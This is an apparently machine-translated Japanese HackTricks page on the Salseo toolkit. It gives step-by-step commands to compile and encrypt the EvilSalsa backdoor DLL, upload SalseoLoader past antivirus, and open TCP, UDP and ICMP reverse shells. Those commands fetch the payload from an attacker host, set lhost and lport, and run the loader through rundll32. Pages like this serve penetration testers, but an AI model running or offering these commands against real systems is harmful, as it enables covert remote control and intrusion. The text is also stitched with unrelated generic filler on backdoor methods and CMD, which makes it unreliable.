14 KiB
Salseo
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ会社で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
- 公式のPEASS&HackTricksのグッズを手に入れましょう。
- 💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
- ハッキングのトリックを共有するには、PRを hacktricks repo と hacktricks-cloud repo に提出してください。
バイナリのコンパイル
githubからソースコードをダウンロードし、EvilSalsaとSalseoLoaderをコンパイルします。コードをコンパイルするにはVisual Studioが必要です。
これらのプロジェクトを、使用するWindowsボックスのアーキテクチャに合わせてコンパイルします(Windowsがx64をサポートしている場合は、そのアーキテクチャにコンパイルします)。
Visual Studio内で、左側の"Build"タブの**"Platform Target"でアーキテクチャを選択**できます。
(**このオプションが見つからない場合は、**"Project Tab"を押し、次に"<Project Name> Properties"**を押します)
次に、両方のプロジェクトをビルドします(Build -> Build Solution)(ログ内に実行可能ファイルのパスが表示されます):
バックドアの準備
まず、EvilSalsa.dllをエンコードする必要があります。これには、Pythonスクリプトencrypterassembly.pyを使用するか、プロジェクトEncrypterAssemblyをコンパイルすることができます:
Python
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
Windows
Windowsは、バックドアを作成するためのさまざまな方法を提供します。以下にいくつかの一般的な手法を紹介します。
リモートデスクトップ
リモートデスクトップ(RDP)は、Windowsマシンにリモートでアクセスするための機能です。バックドアを作成するために、攻撃者はRDPを利用してWindowsマシンにアクセスし、システムに対する制御を取得します。
バックドアアプリケーション
バックドアアプリケーションは、システムに隠された裏口として機能するソフトウェアです。攻撃者は、バックドアアプリケーションをWindowsマシンにインストールし、システムに対するリモートアクセスやコントロールを可能にします。
サービスの改ざん
Windowsでは、サービスと呼ばれるバックグラウンドプロセスが実行されています。攻撃者は、サービスの改ざんを行い、バックドアを作成します。これにより、攻撃者はシステムに対する持続的なアクセスを確保することができます。
レジストリの改ざん
Windowsのレジストリは、システムの設定情報を格納するデータベースです。攻撃者は、レジストリの改ざんを行い、バックドアを作成します。これにより、攻撃者はシステムに対するアクセスや制御を取得することができます。
マルウェアの使用
マルウェアは、悪意のあるソフトウェアのことを指します。攻撃者は、マルウェアを使用してバックドアを作成し、Windowsマシンに侵入します。マルウェアは、バックドアを作成するだけでなく、他の悪意のある活動を行うこともあります。
これらは、Windowsでバックドアを作成するための一般的な手法の一部です。攻撃者は、これらの手法を利用してシステムに侵入し、機密情報を盗み出すなどの悪意のある活動を行うことがあります。
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
よし、これでSalseoのすべてを実行するために必要なものが揃いました: エンコードされたEvilDalsa.dllとSalseoLoaderのバイナリです。
SalseoLoader.exeバイナリをマシンにアップロードしてください。どのAVにも検出されないはずです...
バックドアの実行
TCPリバースシェルの取得(HTTPを介してエンコードされたdllをダウンロード)
リバースシェルリスナーとHTTPサーバーを起動して、エンコードされたevilsalsaを提供することを忘れないでください。
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
UDPリバースシェルの取得(SMBを介してエンコードされたdllをダウンロードする)
リバースシェルのリスナーとしてncを起動し、エンコードされたevilsalsaを提供するためのSMBサーバー(impacket-smbserver)を起動することを忘れないようにしてください。
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
ICMPリバースシェルの取得(既に被害者内にエンコードされたdllが存在する場合)
今回は、クライアント側でリバースシェルを受け取るための特別なツールが必要です。ダウンロードしてください: https://github.com/inquisb/icmpsh
ICMP応答の無効化:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
クライアントを実行する:
./client
The client will connect to the server and wait for commands.
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
ターゲット内部で、salseoの実行を行います:
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
DLLのエクスポートメイン関数としてSalseoLoaderをコンパイルする
Visual Studioを使用してSalseoLoaderプロジェクトを開きます。
メイン関数の前に[DllExport]を追加します
このプロジェクトにDllExportをインストールします
ツール --> NuGetパッケージマネージャー --> ソリューションのNuGetパッケージを管理...
DllExportパッケージを検索します(ブラウズタブを使用)し、インストールを押します(ポップアップを受け入れます)
プロジェクトフォルダには、DllExport.batとDllExport_Configure.batのファイルが表示されます。
DllExportをアンインストールします
アンインストールを押します(はい、奇妙ですが、信じてください、必要です)
Visual Studioを終了し、DllExport_configureを実行します
Visual Studioを終了します
次に、SalseoLoaderフォルダに移動し、DllExport_Configure.batを実行します
x64を選択します(x64ボックス内で使用する場合、私の場合はそうでした)、System.Runtime.InteropServices(DllExportの名前空間内)を選択し、Applyを押します
Visual Studioでプロジェクトを再度開きます
**[DllExport]**はもはやエラーとしてマークされません
ソリューションをビルドします
出力の種類 = クラスライブラリを選択します(プロジェクト --> SalseoLoaderのプロパティ --> アプリケーション --> 出力の種類 = クラスライブラリ)
x64 プラットフォームを選択します(プロジェクト --> SalseoLoaderのプロパティ --> ビルド --> プラットフォームのターゲット = x64)
ソリューションをビルドするには:ビルド --> ソリューションのビルド(出力コンソールに新しいDLLのパスが表示されます)
生成されたDLLをテストします
テストしたい場所にDLLをコピーして貼り付けます。
実行します:
rundll32.exe SalseoLoader.dll,main
エラーが表示されない場合、おそらく機能するDLLを持っています!
DLLを使用してシェルを取得する
HTTPサーバーを使用して、ncリスナーを設定することを忘れないでください。
Powershell
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
CMD
CMD (Command Prompt) is a command-line interpreter in Windows operating systems. It allows users to interact with the operating system by executing commands. CMD can be used to perform various tasks, such as navigating through directories, running programs, and managing files and processes.
CMD provides a wide range of commands that can be used to carry out different operations. Some commonly used commands include:
cd
: Change directorydir
: List files and directoriesmkdir
: Create a new directorydel
: Delete filescopy
: Copy filesmove
: Move filesren
: Rename filestasklist
: List running processestaskkill
: Terminate a running process
CMD can also be used to execute batch scripts, which are a series of commands stored in a text file with the extension .bat
or .cmd
. Batch scripts allow users to automate repetitive tasks by running multiple commands sequentially.
Overall, CMD is a powerful tool for managing and controlling the Windows operating system through the command line interface.
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ会社で働いていますか? HackTricksで会社を宣伝したいですか?または、最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
- 公式のPEASS&HackTricksのグッズを手に入れましょう。
- 💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm.
- ハッキングのトリックを共有するには、PRを hacktricks repo と hacktricks-cloud repo に提出してください。